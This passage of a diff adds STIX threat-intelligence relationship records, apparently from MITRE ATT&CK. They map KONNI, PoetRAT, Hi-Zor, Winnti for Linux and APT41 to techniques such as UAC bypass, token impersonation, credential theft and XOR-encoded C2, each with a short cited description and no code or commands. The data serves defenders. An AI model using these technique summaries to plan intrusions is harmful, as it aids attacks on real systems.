+ "id": "relationship--202e5e50-09e4-431b-a786-d846beb5e009",
+ "type": "relationship",
+ "modified": "2020-04-28T14:51:08.671Z",
+ "created": "2020-04-28T14:51:08.671Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9dffc323-ae0a-430e-b9de-e059862432a1",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.458Z",
+ "created": "2020-04-28T18:12:13.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--27c397ca-aaa1-4cf5-b663-bde9b82050a6",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.490Z",
+ "created": "2020-04-28T18:12:13.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used tasklist.exe to get a snapshot of the current processes\u2019 state of the target machine.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--726cd7e2-d545-4ddf-8f86-fe1cab083dae",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.509Z",
+ "created": "2020-04-28T18:12:13.509Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7431e309-f379-45a5-ae7d-0520f6b17a94",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.512Z",
+ "created": "2020-04-28T18:12:13.512Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings.(Citation: Medium KONNI Jan 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--06f8a778-eebf-4d73-86d3-6ebdbf94ce46",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.518Z",
+ "created": "2020-04-28T18:12:13.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) bypassed UAC with the \u201cAlwaysNotify\u201d settings.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--36a0199f-bce6-4717-a4e4-ce3d75a7ab1c",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.561Z",
+ "created": "2020-04-28T18:12:13.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1cc6adf5-a09d-4878-b816-22af0770d3c1",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.600Z",
+ "created": "2020-04-28T18:12:13.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf5b088a-6d58-41ce-b36d-ff911fe76fb8",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.604Z",
+ "created": "2020-04-28T18:12:13.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b5c85267-6a3e-4254-a851-3529f4f80b55",
+ "type": "relationship",
+ "modified": "2020-04-28T18:12:13.664Z",
+ "created": "2020-04-28T18:12:13.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.814Z",
+ "created": "2020-04-29T18:44:04.814Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--207f1084-a466-4e08-a157-886db373f09a",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.977Z",
+ "created": "2020-04-29T18:44:04.977Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--eeb86f2c-852e-42e6-8809-8d244727bdfe",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:04.988Z",
+ "created": "2020-04-29T18:44:04.988Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7ed3bfbd-41a7-46c4-acf7-43330dd50784",
+ "type": "relationship",
+ "modified": "2020-04-29T18:44:05.009Z",
+ "created": "2020-04-29T18:44:05.009Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9dcf5d9f-7e68-4a5c-a51c-f3c87d5833cd",
+ "type": "relationship",
+ "modified": "2020-04-30T14:10:34.498Z",
+ "created": "2020-04-29T19:30:54.274Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Fidelis Hi-Zor",
+ "description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
+ }
+ ],
+ "description": "[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)",
+ "relationship_type": "uses",
+ "id": "relationship--34e9fc0a-75b9-4100-91ef-30ca3225958a",
+ "type": "relationship",
+ "modified": "2020-04-29T22:19:36.091Z",
+ "created": "2020-04-29T22:01:48.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--64f0efcd-e46a-4bcf-9cbe-4c890e13c01b",
+ "type": "relationship",
+ "modified": "2020-04-30T13:00:53.416Z",
+ "created": "2020-04-30T13:00:53.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7dfa8cdd-102c-4ea6-9fe0-d2e76b688221",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.101Z",
+ "created": "2020-04-30T15:51:59.672Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45e9de66-7203-48e9-bd9b-096c289f35db",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.165Z",
+ "created": "2020-04-30T15:51:59.690Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. (Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--90925137-7ffe-46d6-82d4-0ad7748740a3",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.163Z",
+ "created": "2020-04-30T15:51:59.718Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c85d86c0-8adc-42fc-b7c9-8ca33d9ac4b6",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.169Z",
+ "created": "2020-04-30T15:51:59.722Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40622bce-ea51-4744-9240-4a4c4bf83753",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.167Z",
+ "created": "2020-04-30T16:48:25.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2fc3c031-8a39-4bc9-b3e1-4c5f6ac1e292",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.171Z",
+ "created": "2020-04-30T16:48:25.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the ls command from C2.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2bcaf336-cd02-47e3-b73f-6f0c5cc3592f",
+ "type": "relationship",
+ "modified": "2020-04-30T17:08:59.317Z",
+ "created": "2020-04-30T17:08:59.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--670d65e8-59a9-46ae-bdb6-6cb94a0528ba",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.161Z",
+ "created": "2020-04-30T18:39:20.146Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d",
+ "type": "relationship",
+ "modified": "2020-05-01T15:05:46.940Z",
+ "created": "2020-04-30T20:31:37.999Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca",
+ "type": "relationship",
+ "modified": "2020-04-30T20:31:38.012Z",
+ "created": "2020-04-30T20:31:38.012Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a Cobalt Strike BEACON loader.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3",
+ "type": "relationship",
+ "modified": "2020-05-01T14:48:37.136Z",
+ "created": "2020-05-01T13:57:23.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
